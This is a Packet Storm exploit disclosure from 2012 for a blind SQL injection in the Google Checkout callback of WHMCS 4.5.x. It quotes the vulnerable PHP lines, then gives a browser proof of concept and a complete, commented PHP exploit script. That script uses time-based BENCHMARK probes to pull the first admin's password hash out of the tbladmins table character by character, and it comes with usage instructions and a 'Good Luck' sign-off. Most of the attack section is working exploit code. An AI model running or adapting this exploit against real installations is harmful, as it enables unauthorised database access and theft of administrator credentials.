ID PACKETSTORM:117598
Type packetstorm
Reporter Starware Security Team
Modified 2012-10-22T00:00:00
Description
` ____ _
/ ___|| |_ __ _ _ __ __ ____ _ _ __ ___
\___ \| __/ _` | '__| \ \ /\ / / _` | '__/ _ \
___) | || (_| | | \ V V / (_| | | | __/
|____/ \__\__,_|_| \_/\_/ \__,_|_| \___|
# Software : WHMCS (WHMCompleteSolution)
# Google Dork: Turn on thinking mode :P
# Date: 10/22/2012
# Author: Starware Security Team [www.Resecure.me]
# Contact Us : Security[@]star-ware.com
# Vendor Homepage: http://www.whmcs.com
# Tested on: WHMCS v4.5.2
# Affected versions: 4.5.x
-----------------------------------------------------
#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php
#Vulnerable Source Code Snippet :
LINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input'));
LINE 16: $xmldata = XMLtoArray($xml_response);
LINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER'];
LINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\'Google Checkout\' AND data LIKE \'%new-order-notification%' . $ordernumber . '%\'';
#Proof of Concept :
<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
// Proof of concept: POSTs the crafted notification body to the gateway callback and
// displays the raw response text. The injection marker is a placeholder, not a payload.
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
var http = new XMLHttpRequest();
// netscape.security.PrivilegeManager is a legacy Firefox-only privilege API; where it is
// absent the call throws and the catch only reports that, the request below is still sent.
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
} catch (e) {
alert("Permission UniversalBrowserRead denied.");
}
// site.com is a placeholder host; the path is the vulnerable callback named in the advisory.
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
http.onreadystatechange = handleResponse;
http.send(params);
// Runs on every readyState change; only a finished request with HTTP 200 is surfaced.
function handleResponse() {
if(http.readyState == 4 && http.status == 200){
var response = http.responseText;
alert(response);
}
}
</script>
</body>
</html>
#Exploit Code :
<?php
/*
WHMCS Blind SQL Injection Exploit by Starware Security Team.
Usage: php exploit.php URL seconds
*/
// Removes PHP's max_execution_time limit; the probe loops below run for a long time.
set_time_limit(0);
function post_request($url,$post_data,$follow=0) {
    // Sends $post_data as an HTTP POST to $url and returns the raw response body
    // (curl_exec's return value, so false when the transfer fails).
    // $follow == 1 turns on redirect following; any other value leaves it off.
    // NOTE(review): CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are both 0,
    // so a TLS endpoint is accepted without any certificate validation.
    $options = array(
        CURLOPT_URL => $url,
        CURLOPT_SSL_VERIFYPEER => 0,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
        CURLOPT_HTTPHEADER => array(
            'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language: en-us,en;q=0.5',
            'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
            'Keep-Alive: 115',
            'Connection: keep-alive',
        ),
        // 1 s to connect, 4 s for the whole transfer.
        CURLOPT_CONNECTTIMEOUT => 1,
        CURLOPT_TIMEOUT => 4,
        CURLOPT_POST => 1,
        CURLOPT_POSTFIELDS => $post_data,
    );
    if ($follow == 1) {
        $options[CURLOPT_FOLLOWLOCATION] = TRUE;
    }
    $handle = curl_init();
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    curl_close($handle);
    return $body;
}
function start_time() {
    // Current wall-clock time as a float number of seconds, assembled from the
    // two-field "usec sec" string form of microtime(): seconds plus the fraction.
    list($usec, $sec) = explode(' ', microtime());
    return $sec + $usec;
}
function end_time($start) {
    // Elapsed wall-clock seconds since $start (a value produced by start_time(),
    // i.e. seconds as a float), rounded to the nearest whole second.
    list($usec, $sec) = explode(' ', microtime());
    $now = $sec + $usec;
    return round($now - $start);
}
function check_ascii($num,$num2,$num3) {
// Timing oracle for one position: sends a single probe whose slow SQL branch runs only when the
// byte at position $num3 of the selected value lies in [$num, $num2], and returns true when the
// round trip took at least $seconds. The response body is discarded; elapsed time is the only signal.
// Reads the script globals $url (callback endpoint) and $seconds (delay threshold).
global $url,$seconds;
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
// The payload travels inside <google-order-number>, the field the vulnerable callback concatenates into its query.
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
if(end_time($start) >= $seconds) return true; else return false;
}
function inject($num,$num2,$num3) {
// Resolves the byte at position $num3 by probing every candidate value in [$num, $num2] with an
// equality test, echoing chr($i) for each probe whose round trip reached $seconds.
// Reads the script globals $url and $seconds.
global $url,$seconds;
for($i=$num;$i<=$num2;$i++) {
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
// Output is flushed per character so progress is visible while the scan is still running.
if(end_time($start) >= $seconds) { echo chr($i); flush(); }
}
}
function get_password() {
// Drives the extraction over the 32 positions of the value the probes select (printed by the
// caller as an MD5 hash): each position is first bracketed into one of the digit or lower-case
// letter ranges by check_ascii(), then resolved by inject(). A position that matches no range
// produces no output for that position.
// $url is imported here but not referenced in this body; the callees read it themselves.
global $url;
for($i=1; $i<=32;$i++) {
if(check_ascii(48,52,$i)) { inject(48,52,$i); }
elseif(check_ascii(53,57,$i)) { inject(53,57,$i); }
elseif(check_ascii(97,101,$i)) { inject(97,101,$i); }
elseif(check_ascii(102,106,$i)) { inject(102,106,$i); }
elseif(check_ascii(107,111,$i)) { inject(107,111,$i); }
elseif(check_ascii(112,116,$i)) { inject(112,116,$i); }
elseif(check_ascii(116,122,$i)) { inject(116,122,$i); }
}
}
// Command-line entry: requires the base URL and the delay threshold (in seconds) as arguments.
if ($argc < 3) {
print "Usage: php ".$argv[0]." URL seconds\r\nExample:\r\nphp ".$argv[0]." http://site.com/whmcs/ 1\r\n-----------------------------------------\r\n";
die;
}
// The callback path is appended verbatim to the trimmed first argument.
$url = trim($argv[1])."/modules/gateways/callback/googlecheckout.php";
// Kept as the trimmed argv string; the oracle compares it numerically against end_time()'s rounded float.
$seconds = trim($argv[2]);
echo "[~] Fetching password right now ... \n"; flush();
echo " >> MD5 Password = "; flush();
get_password();
?>
#################################################################################
Note: this vulnerability is only reachable when the Google Checkout payment gateway
has been activated by an admin from the WHMCS admin panel
~ END OF Disclosure ~
Good Luck :)
#################################################################################
# Starware is a company specialized in the Hosting and Information Security field, #
# with a list of high-ranked sites, including mobile operators, that use our Hosting #
# and Security Services. #
# #
# "Company Located in Egypt" #
# #
# http://www.star-ware.com #
# #
#################################################################################
`
{"id": "PACKETSTORM:117598", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WHMCS 4.5.2 Blind SQL Injection", "description": "", "published": "2012-10-22T00:00:00", "modified": "2012-10-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/117598/WHMCS-4.5.2-Blind-SQL-Injection.html", "reporter": "Starware Security Team", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:27", "viewCount": 1, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:16:27", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:27", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/117598/whmcs452-sql.txt", "sourceData": "` ____ _ \n/ ___|| |_ __ _ _ __ __ ____ _ _ __ ___ \n\\___ \\| __/ _` | '__| \\ \\ /\\ / / _` | '__/ _ \\ \n___) | || (_| | | \\ V V / (_| | | | __/ \n|____/ \\__\\__,_|_| \\_/\\_/ \\__,_|_| \\___| \n \n \n# Software : WHMCS (WHMCompleteSolution) \n# Google Dork: Turn on thinking mode :P \n# Date: 10/22/2012 \n# Author: Starware Security Team [www.Resecure.me] \n# Contact Us : Security[@]star-ware.com \n# Vendor Homepage: http://www.whmcs.com \n# Tested on: WHMCS v4.5.2 \n# Affected versions: 4.5.x \n----------------------------------------------------- \n \n#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php \n \n#Vulnerable Source Code Snippet : \n \nLINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input')); \nLINE 16: $xmldata = XMLtoArray($xml_response); \nLINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER']; \nLINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\\'Google Checkout\\' AND data LIKE \\'%new-order-notification%' . $ordernumber . 
'%\\''; \n \n#Proof of Concept : \n \n<html> \n<head> \n<title>WHMCS Blind SQL Injection POC</title> \n</head> \n<body> \n<script> \nvar params = \"<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>\"; \nvar http = new XMLHttpRequest(); \ntry { \nnetscape.security.PrivilegeManager.enablePrivilege(\"UniversalBrowserRead\"); \n} catch (e) { \nalert(\"Permission UniversalBrowserRead denied.\"); \n} \nhttp.open(\"POST\", \"http://site.com/whmcs/modules/gateways/callback/googlecheckout.php\", true); \nhttp.onreadystatechange = handleResponse; \nhttp.send(params); \nfunction handleResponse() { \n \nif(http.readyState == 4 && http.status == 200){ \nvar response = http.responseText; \nalert(response); \n} \n} \n</script> \n</body> \n</html> \n \n#Exploit Code : \n \n \n<?php \n/* \nWHMCS Blind SQL Injection Exploit by Starware Security Team. 
\nUsage: php exploit.php URL seconds \n*/ \n \nset_time_limit(0); \nfunction post_request($url,$post_data,$follow=0) { \n$user_agent = 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'; \n$ch = curl_init(); \n$timeout = 1; \n$execution_timeout = 4; \ncurl_setopt($ch, CURLOPT_URL,$url); \ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); \ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); \ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); \nif($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE ); \ncurl_setopt($ch, CURLOPT_USERAGENT, $user_agent); \ncurl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7','Keep-Alive: 115','Connection: keep-alive')); \ncurl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); \ncurl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout); \ncurl_setopt($ch, CURLOPT_POST, 1); \ncurl_setopt($ch, CURLOPT_POSTFIELDS,$post_data); \n$response = curl_exec($ch); \ncurl_close($ch); \nreturn $response; \n} \n \nfunction start_time() { \n$time = microtime(); \n$time = explode(\" \", $time); \n$time = $time[1] + $time[0]; \nreturn $time; \n \n} \n \nfunction end_time($start) { \n$time = microtime(); \n$time = explode(\" \", $time); \n$time = $time[1] + $time[0]; \n$finish = $time; \n$totaltime = ($finish - $start); \nreturn round($totaltime); \n} \n \n \nfunction check_ascii($num,$num2,$num3) { \nglobal $url,$seconds; \n$start= start_time(); \n$injection = \"/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #\"; \npost_request($url,\"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>\"); \nif(end_time($start) >= 
$seconds) return true; else return false; \n \n} \n \n \nfunction inject($num,$num2,$num3) { \n \nglobal $url,$seconds; \nfor($i=$num;$i<=$num2;$i++) { \n$start= start_time(); \n$injection = \"/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #\"; \npost_request($url,\"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>\"); \nif(end_time($start) >= $seconds) { echo chr($i); flush(); } \n \n} \n \n \n} \n \nfunction get_password() { \nglobal $url; \nfor($i=1; $i<=32;$i++) { \nif(check_ascii(48,52,$i)) { inject(48,52,$i); } \nelseif(check_ascii(53,57,$i)) { inject(53,57,$i); } \nelseif(check_ascii(97,101,$i)) { inject(97,101,$i); } \nelseif(check_ascii(102,106,$i)) { inject(102,106,$i); } \nelseif(check_ascii(107,111,$i)) { inject(107,111,$i); } \nelseif(check_ascii(112,116,$i)) { inject(112,116,$i); } \nelseif(check_ascii(116,122,$i)) { inject(116,122,$i); } \n} \n} \n \n \n \nif ($argc < 3) { \nprint \"Usage: php \".$argv[0].\" URL seconds\\r\\nExample:\\r\\nphp \".$argv[0].\" http://site.com/whmcs/ 1\\r\\n-----------------------------------------\\r\\n\"; \ndie; \n} \n$url = trim($argv[1]).\"/modules/gateways/callback/googlecheckout.php\"; \n$seconds = trim($argv[2]); \necho \"[~] Fetching password right now ... 
\\n\"; flush(); \necho \" >> MD5 Password = \"; flush(); \nget_password(); \n \n?> \n \n \n################################################################################# \n \nNote: to exploit this vulnerability the google checkout payment gateway \nshould be activated by admin from the whmcs admin panel \n \n~ END OF Disclosure ~ \n \nGood Luck :) \n \n################################################################################# \n# Starware is an company specialzed in Hosting and Information Security field # \n# with list of high ranked sites including Mobile operators used our Hosting # \n# and Security Services. # \n# # \n# \"Company Located in Egypt\" # \n# # \n# http://www.star-ware.com # \n# # \n################################################################################# \n`\n"}
{}